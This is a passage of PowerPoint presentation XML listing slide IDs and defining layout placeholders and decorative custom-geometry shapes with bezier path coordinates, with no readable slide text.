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326" r:id="rId4"/>
    <p:sldId id="327" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="328" r:id="rId7"/>
    <p:sldId id="330" r:id="rId8"/>
    <p:sldId id="331" r:id="rId9"/>
    <p:sldId id="332" r:id="rId10"/>
    <p:sldId id="333" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="260" r:id="rId13"/>
    <p:sldId id="261" r:id="rId14"/>
    <p:sldId id="262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334" r:id="rId25"/>
    <p:sldId id="335" r:id="rId26"/>
    <p:sldId id="336" r:id="rId27"/>
    <p:sldId id="337" r:id="rId28"/>
    <p:sldId id="338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4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339" r:id="rId53"/>
    <p:sldId id="299" r:id="rId54"/>
    <p:sldId id="300" r:id="rId55"/>
    <p:sldId id="301" r:id="rId56"/>
    <p:sldId id="302" r:id="rId57"/>
    <p:sldId id="303" r:id="rId58"/>
    <p:sldId id="323" r:id="rId59"/>
    <p:sldId id="325" r:id="rId6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30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B0F7D69-D93C-4C38-A23D-76E000D691CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3496422" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3496422"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1873399 w 3496422"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1895523 w 3496422"/>
              <a:gd name="connsiteY2" fmla="*/ 14997 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3496422 w 3496422"/>
              <a:gd name="connsiteY3" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1622072 w 3496422"/>
              <a:gd name="connsiteY4" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 1105424 w 3496422"/>
              <a:gd name="connsiteY5" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 993668 w 3496422"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 349642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54295" y="1346268"/>
            <a:ext cx="7060135" cy="3285207"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr sz="5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312" y="4631475"/>
            <a:ext cx="7052117" cy="1150200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="109728" tIns="109728" rIns="109728" bIns="91440"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4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123E5C65-E22A-4865-9449-10140D62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54295" y="617415"/>
            <a:ext cx="7123723" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{12241623-A064-4BED-B073-BA4D61433402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24" name="Footer Placeholder 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9C3DE0-E7F5-4B4D-B5AF-CDE724CE7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5" y="6170490"/>
            <a:ext cx="5588349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8C1E146-840A-4217-B63E-62E5CF890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15600" y="6170490"/>
            <a:ext cx="1198829" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r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CD419D4-EA9D-42D9-BF62-B07F0B7B672B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375409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C6FEC9B-9608-4181-A9E5-A1B80E72021C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115540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B1564ED-F26F-451D-97D6-A6EC3E83FD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924161" y="0"/>
            <a:ext cx="2261351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04578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397E4A-EB6A-4FA6-AA4F-69EA0C70F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6ED0C-1DA7-41F0-94CF-6218B1FEDFF1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1A2F5D-7AC4-4F91-965A-7B6A45D6F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6E8B86-CDB8-482F-9D9F-1BFDA3638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619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EECF02AB-6034-4B88-BC5A-7C17CB0EF809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FAEF9944-A4F6-4C59-AEBD-678D6480B8EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6" title="Rule Line">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1005B08-D2D4-455C-AA62-1200E43E7AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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6043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923EF53-7767-4C94-BEF6-D45292794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F3E5F3-28EE-488F-BD53-B744C06C3DEC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CF12700-F905-4CFA-970C-C81E05A64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DA1B1EE2-BCA3-432B-A32D-B04C7F1DD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03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84A89F5-6982-40AE-8108-88B93E85C8FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3124577" y="0"/>
            <a:ext cx="4389519" cy="2916937"/>
            <a:chOff x="3124577" y="0"/>
            <a:chExt cx="4389519" cy="2916937"/>
          </a:xfrm>
        </p:grpSpPr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B80BED93-E30B-4492-A268-84C33CA4F067}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3320637" y="0"/>
              <a:ext cx="4013331" cy="2742133"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 294151 w 4013331"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2742133"/>
                <a:gd name="connsiteX1" fmla="*/ 3844057 w 4013331"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2742133"/>
                <a:gd name="connsiteX2" fmla="*/ 3892490 w 4013331"/>
                <a:gd name="connsiteY2" fmla="*/ 131440 h 2742133"/>
                <a:gd name="connsiteX3" fmla="*/ 4013331 w 4013331"/>
                <a:gd name="connsiteY3" fmla="*/ 941251 h 2742133"/>
                <a:gd name="connsiteX4" fmla="*/ 3804827 w 4013331"/>
                <a:gd name="connsiteY4" fmla="*/ 1540292 h 2742133"/>
                <a:gd name="connsiteX5" fmla="*/ 3187498 w 4013331"/>
                <a:gd name="connsiteY5" fmla="*/ 2098087 h 2742133"/>
                <a:gd name="connsiteX6" fmla="*/ 3051769 w 4013331"/>
                <a:gd name="connsiteY6" fmla="*/ 2204787 h 2742133"/>
                <a:gd name="connsiteX7" fmla="*/ 1936476 w 4013331"/>
                <a:gd name="connsiteY7" fmla="*/ 2742133 h 2742133"/>
                <a:gd name="connsiteX8" fmla="*/ 467303 w 4013331"/>
                <a:gd name="connsiteY8" fmla="*/ 1868695 h 2742133"/>
                <a:gd name="connsiteX9" fmla="*/ 310732 w 4013331"/>
                <a:gd name="connsiteY9" fmla="*/ 1645244 h 2742133"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 4013331"/>
                <a:gd name="connsiteY10" fmla="*/ 941251 h 2742133"/>
                <a:gd name="connsiteX11" fmla="*/ 187749 w 4013331"/>
                <a:gd name="connsiteY11" fmla="*/ 183076 h 2742133"/>
                <a:gd name="connsiteX12" fmla="*/ 288888 w 4013331"/>
                <a:gd name="connsiteY12" fmla="*/ 7329 h 2742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13331" h="2742133">
                  <a:moveTo>
                    <a:pt x="294151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3844057" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3892490" y="131440"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3971777" y="378867"/>
                    <a:pt x="4013331" y="652783"/>
                    <a:pt x="4013331" y="941251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4013331" y="1171430"/>
                    <a:pt x="3948997" y="1356167"/>
                    <a:pt x="3804827" y="1540292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3654026" y="1732895"/>
                    <a:pt x="3427436" y="1910292"/>
                    <a:pt x="3187498" y="2098087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3143231" y="2132693"/>
                    <a:pt x="3097499" y="2168522"/>
                    <a:pt x="3051769" y="2204787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2642425" y="2529345"/>
                    <a:pt x="2343664" y="2742133"/>
                    <a:pt x="1936476" y="2742133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1316045" y="2742133"/>
                    <a:pt x="876647" y="2480932"/>
                    <a:pt x="467303" y="1868695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413736" y="1788559"/>
                    <a:pt x="361372" y="1715679"/>
                    <a:pt x="310732" y="1645244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100850" y="1353195"/>
                    <a:pt x="0" y="1201315"/>
                    <a:pt x="0" y="941251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="683021"/>
                    <a:pt x="63214" y="427935"/>
                    <a:pt x="187749" y="183076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218215" y="123194"/>
                    <a:pt x="251953" y="64578"/>
                    <a:pt x="288888" y="7329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965F60C1-CD8B-4326-9B24-3D197CF382A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3566319" y="0"/>
              <a:ext cx="3401415" cy="2440484"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 332917 w 3401415"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2440484"/>
                <a:gd name="connsiteX1" fmla="*/ 3207137 w 3401415"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2440484"/>
                <a:gd name="connsiteX2" fmla="*/ 3242654 w 3401415"/>
                <a:gd name="connsiteY2" fmla="*/ 74937 h 2440484"/>
                <a:gd name="connsiteX3" fmla="*/ 3401415 w 3401415"/>
                <a:gd name="connsiteY3" fmla="*/ 914184 h 2440484"/>
                <a:gd name="connsiteX4" fmla="*/ 3224702 w 3401415"/>
                <a:gd name="connsiteY4" fmla="*/ 1421888 h 2440484"/>
                <a:gd name="connsiteX5" fmla="*/ 2701498 w 3401415"/>
                <a:gd name="connsiteY5" fmla="*/ 1894635 h 2440484"/>
                <a:gd name="connsiteX6" fmla="*/ 2586463 w 3401415"/>
                <a:gd name="connsiteY6" fmla="*/ 1985068 h 2440484"/>
                <a:gd name="connsiteX7" fmla="*/ 1641219 w 3401415"/>
                <a:gd name="connsiteY7" fmla="*/ 2440484 h 2440484"/>
                <a:gd name="connsiteX8" fmla="*/ 396053 w 3401415"/>
                <a:gd name="connsiteY8" fmla="*/ 1700219 h 2440484"/>
                <a:gd name="connsiteX9" fmla="*/ 263354 w 3401415"/>
                <a:gd name="connsiteY9" fmla="*/ 1510839 h 2440484"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 3401415"/>
                <a:gd name="connsiteY10" fmla="*/ 914184 h 2440484"/>
                <a:gd name="connsiteX11" fmla="*/ 159122 w 3401415"/>
                <a:gd name="connsiteY11" fmla="*/ 271610 h 2440484"/>
                <a:gd name="connsiteX12" fmla="*/ 244841 w 3401415"/>
                <a:gd name="connsiteY12" fmla="*/ 122658 h 2440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401415" h="2440484">
                  <a:moveTo>
                    <a:pt x="332917" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3207137" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242654" y="74937"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3346386" y="322243"/>
                    <a:pt x="3401415" y="608579"/>
                    <a:pt x="3401415" y="914184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3401415" y="1109268"/>
                    <a:pt x="3346890" y="1265837"/>
                    <a:pt x="3224702" y="1421888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3096894" y="1585125"/>
                    <a:pt x="2904852" y="1735475"/>
                    <a:pt x="2701498" y="1894635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2663980" y="1923966"/>
                    <a:pt x="2625221" y="1954332"/>
                    <a:pt x="2586463" y="1985068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2239532" y="2260140"/>
                    <a:pt x="1986324" y="2440484"/>
                    <a:pt x="1641219" y="2440484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1115386" y="2440484"/>
                    <a:pt x="742984" y="2219109"/>
                    <a:pt x="396053" y="1700219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350653" y="1632303"/>
                    <a:pt x="306273" y="1570535"/>
                    <a:pt x="263354" y="1510839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85473" y="1263318"/>
                    <a:pt x="0" y="1134597"/>
                    <a:pt x="0" y="914184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="695327"/>
                    <a:pt x="53576" y="479135"/>
                    <a:pt x="159122" y="271610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184943" y="220858"/>
                    <a:pt x="213538" y="171179"/>
                    <a:pt x="244841" y="122658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9511D06-104E-440E-8049-4CDCE4B87E96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3232490" y="0"/>
              <a:ext cx="4164597" cy="2817185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 237339 w 4130517"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2806419"/>
                <a:gd name="connsiteX1" fmla="*/ 3997489 w 4130517"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2806419"/>
                <a:gd name="connsiteX2" fmla="*/ 4006148 w 4130517"/>
                <a:gd name="connsiteY2" fmla="*/ 24333 h 2806419"/>
                <a:gd name="connsiteX3" fmla="*/ 4130517 w 4130517"/>
                <a:gd name="connsiteY3" fmla="*/ 887307 h 2806419"/>
                <a:gd name="connsiteX4" fmla="*/ 3915925 w 4130517"/>
                <a:gd name="connsiteY4" fmla="*/ 1525677 h 2806419"/>
                <a:gd name="connsiteX5" fmla="*/ 3280571 w 4130517"/>
                <a:gd name="connsiteY5" fmla="*/ 2120090 h 2806419"/>
                <a:gd name="connsiteX6" fmla="*/ 3140878 w 4130517"/>
                <a:gd name="connsiteY6" fmla="*/ 2233796 h 2806419"/>
                <a:gd name="connsiteX7" fmla="*/ 1993019 w 4130517"/>
                <a:gd name="connsiteY7" fmla="*/ 2806419 h 2806419"/>
                <a:gd name="connsiteX8" fmla="*/ 480948 w 4130517"/>
                <a:gd name="connsiteY8" fmla="*/ 1875638 h 2806419"/>
                <a:gd name="connsiteX9" fmla="*/ 319805 w 4130517"/>
                <a:gd name="connsiteY9" fmla="*/ 1637519 h 2806419"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 4130517"/>
                <a:gd name="connsiteY10" fmla="*/ 887307 h 2806419"/>
                <a:gd name="connsiteX11" fmla="*/ 193231 w 4130517"/>
                <a:gd name="connsiteY11" fmla="*/ 79360 h 280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130517" h="2806419">
                  <a:moveTo>
                    <a:pt x="237339" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3997489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006148" y="24333"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4087750" y="288004"/>
                    <a:pt x="4130517" y="579903"/>
                    <a:pt x="4130517" y="887307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4130517" y="1132599"/>
                    <a:pt x="4064304" y="1329464"/>
                    <a:pt x="3915925" y="1525677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3760721" y="1730924"/>
                    <a:pt x="3527514" y="1919967"/>
                    <a:pt x="3280571" y="2120090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3235011" y="2156968"/>
                    <a:pt x="3187944" y="2195151"/>
                    <a:pt x="3140878" y="2233796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2719582" y="2579662"/>
                    <a:pt x="2412097" y="2806419"/>
                    <a:pt x="1993019" y="2806419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354472" y="2806419"/>
                    <a:pt x="902244" y="2528070"/>
                    <a:pt x="480948" y="1875638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425816" y="1790244"/>
                    <a:pt x="371924" y="1712578"/>
                    <a:pt x="319805" y="1637519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103795" y="1326296"/>
                    <a:pt x="0" y="1164446"/>
                    <a:pt x="0" y="887307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="612125"/>
                    <a:pt x="65060" y="340293"/>
                    <a:pt x="193231" y="7936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64F6B39-7B0A-4839-9F52-1FFA2044F248}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124577" y="0"/>
              <a:ext cx="4389519" cy="2916937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 208215 w 4389519"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2916937"/>
                <a:gd name="connsiteX1" fmla="*/ 4284014 w 4389519"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2916937"/>
                <a:gd name="connsiteX2" fmla="*/ 4335794 w 4389519"/>
                <a:gd name="connsiteY2" fmla="*/ 207911 h 2916937"/>
                <a:gd name="connsiteX3" fmla="*/ 4376420 w 4389519"/>
                <a:gd name="connsiteY3" fmla="*/ 1078865 h 2916937"/>
                <a:gd name="connsiteX4" fmla="*/ 4090147 w 4389519"/>
                <a:gd name="connsiteY4" fmla="*/ 1734728 h 2916937"/>
                <a:gd name="connsiteX5" fmla="*/ 3362552 w 4389519"/>
                <a:gd name="connsiteY5" fmla="*/ 2305097 h 2916937"/>
                <a:gd name="connsiteX6" fmla="*/ 3204152 w 4389519"/>
                <a:gd name="connsiteY6" fmla="*/ 2412521 h 2916937"/>
                <a:gd name="connsiteX7" fmla="*/ 1936072 w 4389519"/>
                <a:gd name="connsiteY7" fmla="*/ 2912360 h 2916937"/>
                <a:gd name="connsiteX8" fmla="*/ 421690 w 4389519"/>
                <a:gd name="connsiteY8" fmla="*/ 1787063 h 2916937"/>
                <a:gd name="connsiteX9" fmla="*/ 273167 w 4389519"/>
                <a:gd name="connsiteY9" fmla="*/ 1520080 h 2916937"/>
                <a:gd name="connsiteX10" fmla="*/ 4118 w 4389519"/>
                <a:gd name="connsiteY10" fmla="*/ 696338 h 2916937"/>
                <a:gd name="connsiteX11" fmla="*/ 175984 w 4389519"/>
                <a:gd name="connsiteY11" fmla="*/ 60381 h 29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89519" h="2916937">
                  <a:moveTo>
                    <a:pt x="208215" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4284014" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4335794" y="207911"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4388748" y="479686"/>
                    <a:pt x="4403109" y="773803"/>
                    <a:pt x="4376420" y="1078865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4353703" y="1338514"/>
                    <a:pt x="4265383" y="1540772"/>
                    <a:pt x="4090147" y="1734728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3906850" y="1937616"/>
                    <a:pt x="3642485" y="2116128"/>
                    <a:pt x="3362552" y="2305097"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3310910" y="2339914"/>
                    <a:pt x="3257553" y="2375972"/>
                    <a:pt x="3204152" y="2412521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2726165" y="2739616"/>
                    <a:pt x="2379682" y="2951171"/>
                    <a:pt x="1936072" y="2912360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1260148" y="2853224"/>
                    <a:pt x="807225" y="2516700"/>
                    <a:pt x="421690" y="1787063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371240" y="1691563"/>
                    <a:pt x="321385" y="1604361"/>
                    <a:pt x="273167" y="1520080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73334" y="1170636"/>
                    <a:pt x="-21548" y="989700"/>
                    <a:pt x="4118" y="696338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23232" y="477870"/>
                    <a:pt x="80908" y="264786"/>
                    <a:pt x="175984" y="6038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3099122-D80B-4389-A1CF-52C635217F4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122942" y="0"/>
            <a:ext cx="4069058" cy="3547008"/>
            <a:chOff x="8122942" y="0"/>
            <a:chExt cx="4069058" cy="3547008"/>
          </a:xfrm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CA535D59-CDAA-4AA9-84AC-A6142E857FE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8122942" y="0"/>
              <a:ext cx="4069058" cy="3547008"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 305212 w 4069058"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3547008"/>
                <a:gd name="connsiteX1" fmla="*/ 4069058 w 4069058"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 3547008"/>
                <a:gd name="connsiteX2" fmla="*/ 4069058 w 4069058"/>
                <a:gd name="connsiteY2" fmla="*/ 2865785 h 3547008"/>
                <a:gd name="connsiteX3" fmla="*/ 3996814 w 4069058"/>
                <a:gd name="connsiteY3" fmla="*/ 2947457 h 3547008"/>
                <a:gd name="connsiteX4" fmla="*/ 2732780 w 4069058"/>
                <a:gd name="connsiteY4" fmla="*/ 3541640 h 3547008"/>
                <a:gd name="connsiteX5" fmla="*/ 1317550 w 4069058"/>
                <a:gd name="connsiteY5" fmla="*/ 3015110 h 3547008"/>
                <a:gd name="connsiteX6" fmla="*/ 1140977 w 4069058"/>
                <a:gd name="connsiteY6" fmla="*/ 2901419 h 3547008"/>
                <a:gd name="connsiteX7" fmla="*/ 330269 w 4069058"/>
                <a:gd name="connsiteY7" fmla="*/ 2297252 h 3547008"/>
                <a:gd name="connsiteX8" fmla="*/ 13299 w 4069058"/>
                <a:gd name="connsiteY8" fmla="*/ 1599966 h 3547008"/>
                <a:gd name="connsiteX9" fmla="*/ 217457 w 4069058"/>
                <a:gd name="connsiteY9" fmla="*/ 178659 h 3547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69058" h="3547008">
                  <a:moveTo>
                    <a:pt x="305212" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4069058" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069058" y="2865785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3996814" y="2947457"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3654887" y="3311545"/>
                    <a:pt x="3252443" y="3496175"/>
                    <a:pt x="2732780" y="3541640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2236701" y="3585041"/>
                    <a:pt x="1850359" y="3361306"/>
                    <a:pt x="1317550" y="3015110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1258026" y="2976425"/>
                    <a:pt x="1198546" y="2938265"/>
                    <a:pt x="1140977" y="2901419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828927" y="2701433"/>
                    <a:pt x="534230" y="2512513"/>
                    <a:pt x="330269" y="2297252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135278" y="2091465"/>
                    <a:pt x="37487" y="1876435"/>
                    <a:pt x="13299" y="1599966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-32170" y="1080250"/>
                    <a:pt x="39709" y="589889"/>
                    <a:pt x="217457" y="178659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6948CC-6D51-4092-887C-B0664DC102C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8319994" y="0"/>
              <a:ext cx="3872006" cy="3321595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3466434 w 3872006"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3321595"/>
                <a:gd name="connsiteX1" fmla="*/ 65800 w 3872006"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 3321595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 3872006"/>
                <a:gd name="connsiteY2" fmla="*/ 59511 h 3321595"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 3872006"/>
                <a:gd name="connsiteY3" fmla="*/ 2518435 h 3321595"/>
                <a:gd name="connsiteX4" fmla="*/ 80122 w 3872006"/>
                <a:gd name="connsiteY4" fmla="*/ 2618704 h 3321595"/>
                <a:gd name="connsiteX5" fmla="*/ 1549501 w 3872006"/>
                <a:gd name="connsiteY5" fmla="*/ 3321595 h 3321595"/>
                <a:gd name="connsiteX6" fmla="*/ 2796711 w 3872006"/>
                <a:gd name="connsiteY6" fmla="*/ 2749441 h 3321595"/>
                <a:gd name="connsiteX7" fmla="*/ 2948494 w 3872006"/>
                <a:gd name="connsiteY7" fmla="*/ 2635829 h 3321595"/>
                <a:gd name="connsiteX8" fmla="*/ 3638840 w 3872006"/>
                <a:gd name="connsiteY8" fmla="*/ 2041901 h 3321595"/>
                <a:gd name="connsiteX9" fmla="*/ 3872006 w 3872006"/>
                <a:gd name="connsiteY9" fmla="*/ 1404055 h 3321595"/>
                <a:gd name="connsiteX10" fmla="*/ 3467973 w 3872006"/>
                <a:gd name="connsiteY10" fmla="*/ 1974 h 33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2006" h="3321595">
                  <a:moveTo>
                    <a:pt x="3466434" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="59511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2518435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80122" y="2618704"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="490323" y="3108658"/>
                    <a:pt x="942414" y="3321595"/>
                    <a:pt x="1549501" y="3321595"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004852" y="3321595"/>
                    <a:pt x="2338950" y="3095023"/>
                    <a:pt x="2796711" y="2749441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2847850" y="2710827"/>
                    <a:pt x="2898991" y="2672676"/>
                    <a:pt x="2948494" y="2635829"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3216812" y="2435869"/>
                    <a:pt x="3470203" y="2246981"/>
                    <a:pt x="3638840" y="2041901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800062" y="1845849"/>
                    <a:pt x="3872006" y="1649145"/>
                    <a:pt x="3872006" y="1404055"/>
                  </a:cubicBezTo>
